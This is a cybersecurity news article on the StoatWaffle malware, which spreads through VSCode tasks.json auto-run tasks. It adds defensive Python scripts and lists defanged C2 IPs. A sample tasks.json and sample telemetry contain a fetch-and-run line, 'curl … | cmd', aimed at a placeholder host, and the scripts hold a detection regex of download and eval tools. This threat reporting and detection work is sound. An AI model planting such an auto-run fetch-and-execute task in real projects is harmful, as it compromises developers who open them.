WaterPlum Deploys StoatWaffle Malware in VSCode Based Supply Chain Campaign

From out of nowhere, a hacking crew tied to North Korea – called WaterPlum – dropped a fresh piece of destructive code dubbed StoatWaffle. This tool spreads quietly through Visual Studio Code setups, sneaking in by abusing how much coders rely on public code libraries.

Behind it sits a subgroup known as Team 8, sharpening their methods in ways that feel different, more precise than before. What stands out now is how they twist everyday coding tools into backdoors, turning trusted environments risky for programmers across the globe. Danger grows not with loud blasts but slow shifts like these.

Threat Actor Background

Sometimes called Famous Chollima or PurpleBravo, WaterPlum runs cyber attacks tied to North Korea, chasing money and secrets. One after another, its operations pop up – like Contagious Interview – where coders get tricked by pretend jobs that slip malicious code onto their machines. Inside the group, separate teams move on their own rhythms, crafting different tools yet passing some hacking software between them now and then. Though split into parts, they still echo one another in how they strike.

Somewhere near the end of 2025, things began to change quietly. Instead of sticking with OtterCookie like before, Team 8 switched to something unfamiliar. Researchers at NTT Security Japan caught sight of it first – a fresh piece of malware lurking in their operations.

They decided to call it StoatWaffle. Behind the scenes, this move wasn’t random; it pointed straight back to ongoing work. The group keeps building new tools, swapping them fast enough to stay ahead. What used to be standard now feels outdated. A pattern emerges when you watch closely: evolution happens quickly here. Each step suggests preparation, not chance.

The VSCode Attack Path

Not what you’d expect: the StoatWaffle operation leans hard on hijacking Visual Studio Code’s built-in task system in clever, intricate ways. A fake code repo kicks things off – dressed up like a real blockchain toolkit – playing into how WaterPlum usually goes after finance folks.

Inside the repo sits a .vscode folder holding a custom tasks.json file. When the project opens, it runs hidden actions silently in the background. The runOn setting under runOptions activates when the folder loads into view.

This behavior uses standard VSCode functionality meant to streamline routine steps. Once the developer opens the folder and accepts the trust prompt, the editor processes the task immediately. No extra clicks or confirmations are required after trust is initially granted.

The task launches on its own simply because the environment meets certain conditions. Automation kicks in quietly, just like many built-in tools do during startup.

Right off the bat, confusion sets in – VSCode’s Workspace Trust feature asks if you vouch for a folder’s safety. Yet developers often skip it, particularly when folders are pulled from what appear to be solid blockchain or financial tech sources.

Because of this habit, danger slips through; after approval lands, harmful scripts trigger the moment the directory opens, creeping into systems without a sound. The silence itself is the problem.
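The auto-run behaviour described above comes from a task whose runOptions.runOn value is folderOpen. The script below is an added example, not code from the article or from NTT Security Japan’s research: it audits a repository’s .vscode/tasks.json, flags every task that runs on folder open, and marks those whose command line fetches or executes remote content or hides its terminal. The tasks.json content is constructed to mirror the pattern the article describes; the URL in it is a placeholder, not a real indicator.

```python
"""Audit a repository's .vscode/tasks.json for tasks that run on folder open.

Added example, not from the original article or NTT Security Japan's report.
The tasks.json content below is constructed; the URL is a placeholder.
"""
import json
import re

# Constructed sample: what a suspicious .vscode/tasks.json might look like.
SAMPLE_TASKS_JSON = r'''
{
  // VSCode allows comments in tasks.json, so a plain json.loads() would fail
  "version": "2.0.0",
  "tasks": [
    {
      "label": "build",
      "type": "shell",
      "command": "npm run build",
      "group": "build"
    },
    {
      "label": "bootstrap",
      "type": "shell",
      "command": "curl -s https://EXAMPLE-PLACEHOLDER.invalid/x | cmd",
      "runOptions": { "runOn": "folderOpen" },
      "presentation": { "reveal": "never" }
    }
  ]
}
'''

# Tokens that indicate a task pulls down or evaluates remote content.
REMOTE_FETCH = re.compile(
    r"\b(curl|wget|Invoke-WebRequest|iwr|Invoke-Expression|iex|"
    r"DownloadString|Net\.WebClient|node\s+-e|bash\s+-c)\b",
    re.IGNORECASE,
)


def strip_json_comments(text: str) -> str:
    """Remove /* */ blocks and comment-only // lines (VSCode's JSONC) before parsing.

    Only whole-line // comments are stripped so that https:// inside strings survives.
    """
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.DOTALL)
    return re.sub(r"^\s*//.*$", "", text, flags=re.MULTILINE)


def task_command_text(task: dict) -> str:
    """Flatten command + args, including windows/osx/linux overrides, into one line."""
    def val(x):
        if isinstance(x, str):
            return x
        return str(x.get("value", "")) if isinstance(x, dict) else str(x)

    parts = []
    for scope in (task, task.get("windows"), task.get("osx"), task.get("linux")):
        if not isinstance(scope, dict):
            continue
        if "command" in scope:
            parts.append(val(scope["command"]))
        parts.extend(val(a) for a in scope.get("args", []))
    return " ".join(p for p in parts if p)


def audit_tasks_json(text: str) -> list:
    """Return one finding dict per task that auto-runs when the folder is opened."""
    data = json.loads(strip_json_comments(text))
    findings = []
    for task in data.get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        command = task_command_text(task)
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": command,
            "fetches_remote": bool(REMOTE_FETCH.search(command)),
            "hidden_terminal": (task.get("presentation") or {}).get("reveal") == "never",
        })
    return findings


if __name__ == "__main__":
    for f in audit_tasks_json(SAMPLE_TASKS_JSON):
        level = "HIGH" if f["fetches_remote"] else "REVIEW"
        print(f"[{level}] task '{f['label']}' runs on folderOpen: {f['command']}")
```

Run it over each cloned repository before opening the folder in the editor, or wire it into a pre-clone review step; any folderOpen task deserves a look, and one that downloads and pipes content into a shell deserves a refusal at the Workspace Trust prompt.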

Multi-Stage Infection Chain

Whatever the operating system, the automatic process grabs a payload from a Vercel-hosted app – a real cloud service – setting up a cross-platform start to the compromise. Once retrieved, that data flows straight into cmd.exe to run.

This initial piece of code does just one thing – pull down a follow-up file named vscode-bootstrap.cmd. That script begins by checking the ground it lands on, starting with a search for Node.js. When Node.js isn’t found, the script quietly grabs it straight from the official site. Its job? To lay out the tools StoatWaffle needs while staying under notice.

Once Node.js checks out, the bootstrap grabs a couple more pieces – env.npl and package.json – then runs env.npl straight through Node. Together, those bits kick off StoatWaffle’s main moving parts.

StoatWaffle Modular Design with Integrated Loading System

One part flows into another; StoatWaffle builds on Node.js with pieces that fit together like tools in a kit. This setup gives WaterPlum’s team room to shift how they operate whenever needed. First comes a two-phase loader – quiet at first, then active.

After that comes the Stealer, pulling data without drawing attention. Last in line is the RAT, which opens doors for remote control once inside.

Right off, env.npl kicks things off by loading StoatWaffle. It keeps checking in every five seconds, pinging /api/errorMessage on the C2. When that call fails, the reply gets pulled apart – whatever’s tucked inside runs straight away as Node.js code.

Five minutes passed before anything new showed up during the NTT Security Japan SOC watch. That delay hints at someone pulling strings behind the scenes, deciding when to send the next piece. Another piece of code kicks off after the first one finishes.

Instead of stopping, it keeps checking in every five seconds – same server, different door: /api/handleErrors. When it hears back, whatever comes inside gets run straight away as Node.js work. Nothing lands on the hard drive here either.

Each step hides what’s truly coming next. Because no file has been saved yet, scanners looking for known bad patterns struggle to catch anything at this point.

Right when the second loader runs, the Stealer arrives at the same time as the RAT – both unfold without delay. One triggers, the other follows close behind. Not one before the other – they land together.
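Because the loaders never write a file, the chain above is easier to catch from process telemetry than from disk scans. The script below is an added example, not code from the article or from NTT Security Japan: it walks constructed Sysmon/EDR-style process-creation events, finds Node.js processes whose ancestry includes both a shell and the editor, and flags those running a script with a non-JavaScript extension or from a temp directory. The names env.npl and vscode-bootstrap.cmd come from the article; the paths, PIDs and the placeholder URL are made up.

```python
"""Hunt for the editor -> shell -> Node.js execution chain the article describes.

Added example, not from the article or from NTT Security Japan. All events are
constructed sample telemetry; the URL is a placeholder.
"""

EDITORS = {"code.exe", "code", "code-insiders"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash", "zsh"}
NODE = {"node.exe", "node"}

# Constructed sample telemetry: one dict per process-creation event.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "Code.exe",
     "cmdline": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe"},
    {"pid": 210, "ppid": 200, "image": "cmd.exe",
     "cmdline": "cmd.exe /d /c curl -s https://EXAMPLE-PLACEHOLDER.invalid/x | cmd"},
    {"pid": 220, "ppid": 210, "image": "cmd.exe", "cmdline": "cmd.exe /c vscode-bootstrap.cmd"},
    {"pid": 230, "ppid": 220, "image": "node.exe",
     "cmdline": r"node.exe C:\Users\dev\AppData\Local\Temp\env.npl"},
    # Benign: the developer's own build task spawned from the same editor.
    {"pid": 240, "ppid": 200, "image": "cmd.exe", "cmdline": "cmd.exe /d /c npm run build"},
    {"pid": 250, "ppid": 240, "image": "node.exe",
     "cmdline": r"node.exe C:\Users\dev\repo\node_modules\webpack\bin\webpack.js"},
]


def lineage(pid, by_pid):
    """Return the process and its ancestors, nearest first; stops on unknown or looping PIDs."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def node_script(cmdline):
    """Best-effort: the first argument after the node binary, stripped of quotes."""
    parts = cmdline.split()
    return parts[1].strip('"') if len(parts) > 1 else ""


def unusual_node_script(path):
    """True when Node runs a file without a JS/TS extension or from a temp directory."""
    lower = path.lower()
    ok_ext = lower.endswith((".js", ".mjs", ".cjs", ".ts"))
    in_temp = "\\temp\\" in lower or "/tmp/" in lower
    return bool(path) and (not ok_ext or in_temp)


def find_suspicious_chains(events):
    """Flag Node.js processes descended from editor -> shell that run an unusual script."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if ev["image"].lower() not in NODE:
            continue
        chain = lineage(ev["pid"], by_pid)
        ancestors = [c["image"].lower() for c in chain[1:]]
        if not (any(a in SHELLS for a in ancestors) and any(a in EDITORS for a in ancestors)):
            continue
        script = node_script(ev["cmdline"])
        if not unusual_node_script(script):
            continue
        findings.append({
            "pid": ev["pid"],
            "script": script,
            "chain": " > ".join(c["image"] for c in reversed(chain)),
        })
    return findings


if __name__ == "__main__":
    for f in find_suspicious_chains(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['chain']} running {f['script']}")
```

The benign webpack build from the same editor is left alone because its script lives in the repository and has a .js extension; the point of the heuristic is to separate developer-run Node from Node launched by a shell on a file that no project would normally carry.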

Stealer Module Targets Credentials on Multiple Platforms

A sneaky piece of software called StoatWaffle Stealer grabs login details on Windows, macOS, and Linux systems. Browser passwords form its main goal, especially those saved in Chrome-style apps, along with Firefox.

When someone uses Chrome, Edge, or similar browsers, the malware pulls saved passwords along with specific add-on details – this becomes risky if those add-ons handle crypto wallets.

In Firefox setups, it opens the extensions.json file to list active plugins, then scans for specific keywords associated with valuable tools before stealing anything. A secret vault on Mac computers is compromised when the Stealer module kicks into action. This built-in storage, called Keychain, holds login details, app codes, and digital certificates tightly tucked inside the OS.

Instead of stopping short, the tool digs deep, pulling out what was meant to stay locked away. Hidden credentials surface where they shouldn’t, exposed through precise system-level reach.

Once gathered, files land in a temp folder on the infected machine under a scrambled name before being sent to the C2 via the /upload endpoint.

Another piece runs separately, scanning every program currently installed, then shoving that list into /uploadsecond, which arms WaterPlum with a clear map of what’s inside the target setup ahead of next moves.

StoatWaffle knows when it runs inside WSL. When active there, the Stealer part looks for signs of a Linux setup on Windows. Instead of moving forward unthinkingly, it pauses to confirm its surroundings first. Only then does it grab the current user’s Windows directory.

That string is fed into wslpath, a built-in tool, to turn it into something usable under Linux. With the path translated correctly, access shifts quietly across layers. What seems like separation becomes just another step in reach. Files meant to stay isolated suddenly sit within grasp. A script running in what feels like a container steps right through the wall.

RAT Module Executes Commands Remotely

A quiet signal wakes every few minutes, reaching toward /api/hsocketNext like a thread tugging at silence. From that pull comes a list of tasks whispered by someone far away. Once it hears what to do, the tool moves across the machine – careful, unseen – doing each step exactly. After finishing, it slips the outcome back through /api/hsocketResult, folding itself again into wait.

A single Node.js script lets WaterPlum run quietly inside hacked dev systems, linking back to its handlers. Through it, actions shift step by step – moving sideways across machines, pulling files, setting up next-stage tools – without standing out. Since real dev setups often run similar scripts, the malicious one slips through unnoticed. Control flows steadily, tucked behind normal-looking activity, hard to spot amid genuine processes.

IOC

Indicator            Type
185[.]163.125.196    C2 IP Address
147[.]124.202.208    C2 IP Address
163[.]245.194.216    C2 IP Address
66[.]235.168.136     C2 IP Address
87[.]236.177.9       C2 IP Address

Watch for traffic heading out toward these IP blocks, especially from build servers or dev machines. Blocking such addresses at the network edge helps reduce risk. Traffic patterns matter most when they link back to automated systems or code environments.
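The indicators above are published defanged, so they cannot be pasted straight into a matching rule. The script below is an added example, not code from the article: it refangs the five C2 addresses from the IOC table, parses a constructed connection log (timestamp, source, destination:port, process; the source and non-matching destinations use TEST-NET documentation ranges, not real traffic) and reports the connections that hit the list.

```python
"""Match outbound-connection records against the article's defanged C2 list.

Added example, not part of the article. Indicators come from the IOC table;
the connection log is constructed sample data in a simplified format.
"""
import ipaddress

# The five C2 addresses from the article's IOC table, left defanged as published.
DEFANGED_IOCS = [
    "185[.]163.125.196",
    "147[.]124.202.208",
    "163[.]245.194.216",
    "66[.]235.168.136",
    "87[.]236.177.9",
]

# Constructed sample connection log (not real traffic): ts src dst:port process
SAMPLE_CONN_LOG = """\
2026-01-12T09:14:02Z 192.0.2.21 185.163.125.196:443 node.exe
2026-01-12T09:14:07Z 192.0.2.21 198.51.100.7:443 git.exe
2026-01-12T09:14:09Z 192.0.2.22 87.236.177.9:443 node.exe
2026-01-12T09:14:15Z 192.0.2.23 203.0.113.40:443 Code.exe
"""


def refang(indicator: str) -> ipaddress.IPv4Address:
    """Turn a defanged indicator such as 185[.]163.125.196 back into an address object."""
    cleaned = indicator.strip()
    for token in ("[.]", "(.)", "[dot]", "{.}"):
        cleaned = cleaned.replace(token, ".")
    return ipaddress.ip_address(cleaned)


def load_iocs(defanged) -> set:
    """Refang every published indicator into a set for O(1) lookups."""
    return {refang(i) for i in defanged}


def parse_conn_line(line: str) -> dict:
    """Parse one 'ts src dst:port proc' record; rsplit keeps IPv6-style colons intact."""
    ts, src, dst_port, proc = line.split()
    dst, port = dst_port.rsplit(":", 1)
    return {"ts": ts, "src": src, "dst": ipaddress.ip_address(dst),
            "port": int(port), "proc": proc}


def match_connections(log_text: str, iocs: set) -> list:
    """Return the records whose destination address is in the IOC set."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_conn_line(line)
        if rec["dst"] in iocs:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in match_connections(SAMPLE_CONN_LOG, load_iocs(DEFANGED_IOCS)):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['port']} by {hit['proc']}")
```

Matching on the destination alone answers the first question; the process column answers the second one the article raises, since a Node.js binary talking to one of these addresses from a build server or developer workstation is exactly the pattern worth paging on.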

Mitigation and Defensive Recommendations

Out of nowhere, risky shortcuts creep into dev workflows when teams skip checking what hidden scripts lurk inside a new project’s .vscode folder. Think twice before saying yes to that prompt about trusting a workspace – especially if you didn’t build it yourself. A quiet red flag pops up whenever strange background processes start talking back outside normal hours. Watch how tools like tasks.json behave; they can sneak out data under the radar.

Some firms are now wiring alarms into their systems so every new node execution gets noticed instantly. Trust shouldn’t be automatic – it’s better earned than assumed by default. Behind each launch.json file could be a chain reaction waiting to trigger. Monitoring kicks in where habits fall short, catching odd patterns no checklist would spot. Security gaps widen fastest during moments of convenience. Quiet checks today prevent loud breaches tomorrow.

Since WaterPlum keeps aiming at blockchain coders, crypto companies, and fintech teams, folks in those areas ought to eye random repo invites, GitHub collab pings, or contract gigs more warily. Before loading any code into VSCode, check where it really came from – also scan the auto-run scripts tucked inside. Making that routine sharpens how devs guard their work.

Ongoing Threat Landscape

StoatWaffle shows up right on schedule, fitting WaterPlum’s habit of swapping out tools while always pushing ahead with fresh versions. Not long ago, it was OtterCookie; then came OtterCandy. Now, with this latest shift, it points to a pattern built around speed and adaptation.

Software coders keep landing in the crosshairs, drawn in through familiar workflows they trust without question. Attack methods targeting Visual Studio Code have multiplied lately, as seen in operations such as GlassWorm and the combination of Anivia with OctoRAT.

What hides inside everyday coding environments often slips past guards, making these spaces quiet but dangerous openings for intrusions. IDEs sit at the edge of attention, overlooked even as threats grow sharper and more focused beneath the surface.

FAQ

How does StoatWaffle get executed?

A sneaky script runs as soon as someone opens a dodgy project folder – thanks to how tasks.json handles startup actions in VSCode. The trick hides inside what looks like normal behavior, firing off harmful code without warning.

What does StoatWaffle steal?

A thief inside your browser grabs passwords first. Next it pulls out crypto wallet data saved by extensions. Secrets tucked away in macOS Keychain get pulled too. The software you have installed gets listed without warning. All of it travels straight to remote servers run by the attackers.

Site: thecybrdef.com

John

John is a cybersecurity reporter covering the latest cyber threats, data breaches, and security research. Focused on translating complex technical topics into clear, actionable insights. Dedicated to delivering accurate, timely news to inform and protect the digital community.
